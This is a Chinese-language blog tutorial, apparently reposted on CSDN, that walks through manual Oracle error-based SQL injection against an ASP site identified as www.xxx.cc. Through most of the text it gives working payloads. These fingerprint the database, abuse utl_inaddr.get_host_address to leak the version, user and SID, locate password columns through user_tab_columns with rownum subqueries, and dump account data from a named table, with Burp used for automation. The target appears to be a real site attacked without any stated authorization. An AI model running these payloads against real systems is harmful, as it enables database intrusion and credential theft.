asp获取mysql数据报错_Oracle爆错手工注入

最新推荐文章于 2022-02-19 13:12:09 发布
最新推荐文章于 2022-02-19 13:12:09 发布
阅读量132 收藏
点赞数
文章标签: asp获取mysql数据报错
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30047651/article/details/113375259
版权

0x00 目标

目标:http://www.xxx.cc/view.asp?kind=NN4&bbsno=45

0x01 判断数据库类型

oracle 支持-- 类型注释,但是不支持;分隔执行多语句,oracle 有很多系统表,譬如user_tables,通过对这些表的访问也可以判断出是否属于oracle,另外在oracle 里的一些函数也可以用来判断,譬如utl_http.request 这些,语言上的小细节也可以用来区分系统,譬如在oracle 里|| 是连接符号,但是在其他数据库里就不是了,所以 and

chr(123)||chr(123)=chr(123)||chr(123)这样的,如果可以顺利执行,那么就基本应该是oracle 了。

我们在链接地址后加上单引号,返回信息

"[Oracle][ODBC][Ora]ORA-01756:단일 인용부를 지정해 주십시오 "

如下图

cd8a5a818282a92ca2f56ebfb4e19e9b.png

继续进行判断再此提交:

view.asp?kind=NN4&bbsno=45 and (select count (*) fromuser_tables)>0--

view.asp?kind=NN4&bbsno=45 and (select count (*) from dual)>0—

如下图:

11d85ccd7fb82a2345b40ac6f8183925.png

基本上可以确定是oracle 数据库了。Asp+oracle 的数据库很少少见啊!

接下来的渗透有两个方向,一个是通过爆错来获取我们所需要的信息,另外一个是通过union 联合查询来获取我们所需要的信息。由于这个注入点无法进行union,所以只有通过报错来获取勒。

0x02 爆错基本信息刺探

函数:utl_inaddr.get_host_address

用法:utl_inaddr.get_host_address(sql Injection)

utl_inaddr.get_host_address 本意是获取ip 地址,但是如果传递参数无法得到解析就会返回一个oracle 错误并显示传递的参数。我们传递的是一个sql 语句所以返回的就是语句执行的结果。oracle 在启动之后,把一些系统变量都放置到一些特定的视图当中,可以利用这些视图获得想要的东西。通常非常重要的信息有:

1 当前用户权限 (select * from session_roles)

2 当前数据库版本 ( select banner from sys.v_$version where rownum=1)

3 服务器出口IP (用utl_http.request 可以实现)

4 服务器监听IP (select utl_inaddr.get_host_address from dual)

5 服务器操作系统 (select member from v$logfile where rownum=1)

6 服务器sid ( 远程连接的话需要, select instance_name fromv$instance;)

7 当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual)

.....信息刺探如下图:

610aafee90324aebd8e9c8c8d75b0356.png

cbc016f73c98d247ad4538b22df417ac.png

49a7f1444ba30350fc011a4635b0acb7.png

获取信息如下:

数据库版本为:Oracle9i Release 9.2.0.8.0 – Production

当前数据库连接用户名为IGM

操作系统平台为windows;

服务器sid 为igm。

0x03 获取表名

Oracle 数据库的注入不同于其他数据库,如Access 和Mysql,它包含了几个系统表,这几个系统表里存储了系统数据库的表名和列名,如user_tab_columns,all_tab_columns,all_tables,user_tables 系统表就存储了用户的所有的表、列名,其中table_name 表示的是系统里的表名,column_name 里的是系统里存在的列名,我们就可以通过这些系统表来猜测系统的数据库结构了!

在这里也有个小技巧就是我们可以通过查询系统表来找找敏感字段如password 在哪个表中。首先我们看下含有password 的表有多少个。

语句如下:

select count(*) from user_tab_columns where column_name like '%25PASSWORD%25'

注意其中的%25 是% 的Url 编码, 通过这个语句就可以查询user_tab_columns 系统表,看里面列名与password 相似的记录的条数,注意列名要用大写表示哦!如下图:

1ceb35823f3ef8ee77597e4d218f0655.png

总共含有password 字段的表名有6 个,那我们如何知道password 字段所对应的表是哪个勒?以前有个古老的方法就是结合union 查询对应的表名。但是今天的情况特殊,无法进行union 联合查询,就算可以union 联合查询,也只能查询一个表,并且查询第二个表也是用TABLE_NAME<>’表名’来实现的,在表情况非常多的情况下,这总方法

就相形见拙勒。那有没有其他什么快捷的方法了?想想mysql 数据库手工注入中有limit 可以查看数据!那oracle 能否可以?Oracle 没有limit 这样的语句所以可以用where rownum=1 来返回第一条数据。但是如果想知道其他某一条记录怎么办呢?直接rownum=2 是不行的,这里可以再次嵌套一个子查询语句如下:

select chr(126)||chr(39)||data||chr(39)||chr(126) from (select rownum as limit,table_name||chr(35)||column_name as data from user_tab_columns where column_name like '%PASSWORD%') where limit =2

这样就可以得到第二条记录了,灵活运用可以很快取得需要的数据

效果如下图:

8827c147191b274d1569af239492ec59.png

刚才我们前面已经查询到总共有6 个表含有password 字段那我们就结合神器burp 来获取下我们所需要的数据,至于burp 如何获取数据,请参考我的上篇文章。数据结果如图所示:

50b56ad4b2f08247dc2b2bd2ea31200c.png

不知道什么原因获取到的数据有误差只出现了4 个表,换其他的表也少几个

961d6750ccd398f176e3d30eb32f6129.png

9f1b6b0881332418366c639f39180653.png

0x04 获取列名

现在我们来看看表所对应的列名语句如下:

select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,column_name as data from user_tab_columns whEre table_name=chr(70)||chr(71)||chr(87)||chr(49)||chr(48)||chr(49)||chr(84)) whEre limit =1

手工进行测试第一个如下图所示:

6a226fc0f5c42a552de7af99ab43cf98.png

成功报出第一个列名,后续的手工我们就用burp,爆出所有的列名,

过程如下图所示:

3091ea1863b04015657d641540d8a663.png

804dffeec723e7c0fb20176812472e87.png

d9278e6ba32d65d9b50957c899e4cfdc.png

dfb841ed7168822c4e4a7890d6089885.png

0x05 获取内容

现在知道所有的列了,那修改语句进行爆数据咯。。语句如下:

Select chr(126)||chr(39)||data||chr(39)||chr(126) from (selEct rownum as limit,PASSWORD||chr(35)||id||chr(35)||PASSWORD||chr(35)||NAME||chr(35)||IN_DATE||chr(35)||UP_DATE as data from FGW101T

b4a3ec4a0e3b5d21d22d05647bf24e3e.png

c2e7afa47b319e35404c908aab1e8836.png

教程完毕,渗透就到这里吧。

翰遴院遴选
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle报错注入
笔墨稠思
11-25 2229
Oracle报错注入原理 通过ctxsys.drithsx.sn(user,查询语句)函数来根据页面报错获取我们需要的内容 注意事项: 1.oracle数据库在查询时,必须写表名,如果表不存在可以使用虚表 dual 2.Oracle数据库的字段数据类型是强匹配,必须保持数据类型相同 3.Oracle系统表 all_tables、user_tables、all_tab_columns、user_tab_columns 4.oracle限制查询结果返回的数量用rownum 靶场:http://59.63.2
asp注入漏洞测试环境
02-28
学习环境。主要是从通过注入拿到网站后台的用户名和密码
mysql报错注入实战_MySQL 报错注入原理分析以及运用
weixin_42513448的博客
02-28 203
0x00 前言之前在做sqli-labs 第五第六题的时候是利用盲注来进行做的 中途操作过程非常繁杂每个信息都要使用脚本来进行拆解 就算我用python编了相应的脚本 仍然感觉麻烦 所以昨天再去看了看 好像题目的本意不是让我们用盲注的方法来实现的 题目是想让我们使用报错注入 (双查询注入)来进行获取数据库的一些信息0x01 原理分析首先需要知道的一些知识为什么叫做报错注入 原因就是我们是通过反馈出...
Oracle注入——报错注入
m0_55854679的博客
02-19 2752
SQL注入之重新认识 文章目录Oracle数据库dual表数据库语句报错注入函数解析练习 Oracle数据库 一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。 dual表 Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,那么要它有什么用呢?
DDL操作数据
weixin_45701447的博客
09-09 774
一.什么是 sql sructured Query Language:结构化查询语言 定义了操作所有 关系型数据库的规则 。每一种数据库操作的方式存在不一样的地方称为方言. 二.sql 通用的语法 1.sql可以单行书写 也可以多行书写 以 分号 结尾 2.mysql 不区分大小写但是关键字 建议大写 三.sql分类 1.DDL:操作数据库和表 (1)操作数据库:CRUD C:创建 创建数据库 create database 数据库名称; create database if not exists 数据库名
kb.rar_ASP ORACLE_oracle
最新发布
09-24
标题中的"kb.rar_ASP ORACLE_oracle"表明这是一个关于ASPOracle技术的资源压缩包,其中可能包含与这两种技术的结合使用相关的资料。描述提到的知识库涵盖了多种Web开发语言和数据库系统,如ASP、PHP、JSP、Oracle...
asp textbox获取显示mysql数据示例代码
01-20
代码如下: using MySql.Data.MySqlClient; MySqlConnection conn = new MySqlConnection(“server=(local);database=abc;uid=;pwd=”); conn.Open(); MySqlCommand com = new MySqlCommand(“select * from tb_xxjj...
ASPNET_MySQL.rar_asp mysql_asp.net mysql
09-22
本压缩包文件"ASPNET_MySQL.rar_asp mysql_asp.net mysql"提供了一种实现ASP.NET应用与MySQL数据库交互的实例教程。 首先,我们要了解ASP.NET环境下的MySQL连接。ASP.NET是微软开发的一种用于构建动态网站、Web应用...
news_mysql.zip_MYSQL_asp.net mysql
09-20
【新闻MYSQL.zip_MYSQL_asp.net mysql】是一个教学资源,主要涵盖了如何使用ASP.NET与MySQL数据库构建一个简单的新闻发布系统。这个系统对初学者来说是个很好的起点,能够帮助他们理解Web开发中的基本概念和技术。 ...
kejian.rar_MYSQL_asp kejian_asp mysql_mysql asp
09-19
【标签】"mysql asp_kejian asp_mysql mysql_asp" 进一步强调了关键技术和关键词,这些标签可能用于搜索或分类,帮助用户找到相关资源。 【压缩包子文件的文件名称列表】: "kejin332" 没有提供太多具体信息,但可能...
改进的SQL防注入(加强抑错)
03-25 1439
ASP注入之解决方案特殊页面处理因为有些页通过流式传递(比如含有文件上传的表单)如果单一使用穷举Form对象的操作就会出错所以要把这些页面过滤出来,同时在页面中使用sql("检测的字串")才行垃圾猪zero@new57.comhttp://blog.csdn.net/cfaq源码下载http://www.new57.com/softback/sql.rar  将本页用inclu
一次对ASP+ORACLE注入手记
得峰的专栏 [网络收藏]
07-26 803
   
asp mysql 注入_ASP注入靶机
weixin_29157493的博客
01-26 142
ASP:Dim Db,MyDbPathdim conn'可修改设置一:========================定义数据库类别,1为SQL数据库,0为Access数据库=============================Const IsSqlDataBase =0MyDbPath = ""'================================================...
sql注入之靶机经典案例:MSSQL+ASP注入练习环境2(单页,数字型显错)
永不垂头的博客
08-06 533
靶机经典案例:MSSQL+ASP注入练习环境2(单页,数字型显错) 和之前命令一样,先拿到数据库名。 然后拿到表名 再拿相关字段 最后拿到用户名和密码: (完毕!!成功拿到权限!!!) 后续操作请持续关注哦!!! 了解更多请关注下列公众号: ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???? ???????????????????????????????????? ???? ???? ????
mysql报错注入_Mysql报错注入详解
weixin_34138102的博客
12-23 244
Mysql报错注入1、前言有的时候我们发现一个注入页面,该页面的数据不是由我们所控制的变量获取的,不能通过常规的union查询获取到结果,此时幸运的是我们在输入一个单引号的时候发现页面打印了一些报错的信息,但是如何利用,我们下面来详细说明一下。2、环境(Windows2003+wamp)配置好php的环境,准备一个注入页面,在渗透系统的8080端口处,注入点:http://192.168.4.12...
SQL注入系列之ASP+ACCESS手动注入(一)----数字型
热门推荐
fendo
12-30 2万+
一、access数据库 1.简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一
sql注入获取mysql信息_手把手教你通过SQL注入盗取数据库信息
weixin_33473110的博客
02-11 941
我们都是善良的银!一生戎码只为行侠仗义,知道这个不是为了做啥非法的事,只是知道小偷怎么偷东西才能更好地防范。SQL注入(SQL Injection),指将非法的SQL命令插入到URL或者Web表单中请求,而这些请求被服务器认为是正常的SQL语句进行执行。下面我们用sqli-labs这个开源项目来演示一下SQL注入盗取信息的全程,我们不是为了sqli-labs是一个sql注入的练习靶机,项目地址为:...
sql注入之显错注入
qq_33557485的博客
05-05 1770
1.判断是否存在注入点: 在正常输入后面添加and 1=1 查看是否正常回显。如果一切正常说明该处存在注入点。#是数据库查询的结束标志。?id=1' and 1=1# 这里的?id=1’使用单引号闭合查询语句。不同的查询写法使用响应的闭合方式 2.猜解字段数。 每一个数据库查询语句的结果都是一个表格,使用order by查询该查询结果一共查询了几个字段。因为使用union查询前后的字段数必须...
ASP.NET连接Oracle数据库示例代码
"ASP.NET连接Oracle数据库的方法" 在ASP.NET中,连接Oracle数据库是常见的操作,这对于构建基于Web的应用程序至关重要。下面将详细解释如何使用C#语言在ASP.NET环境中实现Oracle数据库的连接。 首先,为了连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值